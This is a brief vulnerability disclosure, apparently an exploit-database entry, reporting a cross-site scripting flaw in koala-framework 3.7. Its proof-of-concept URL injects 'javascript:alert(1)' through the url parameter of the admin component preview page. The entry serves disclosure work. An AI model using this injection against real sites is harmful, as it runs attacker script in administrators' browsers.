# Affected software: koala-framework
# Type of vulnerability:xss
# URL:koala-framework.org
# Discovered by: provensec
# Website: provensec.com
#version:
Version 3.7
# Proof of concept
http://cms-demo.koala-framework.org/admin/component/preview/?url=javascript:alert(1)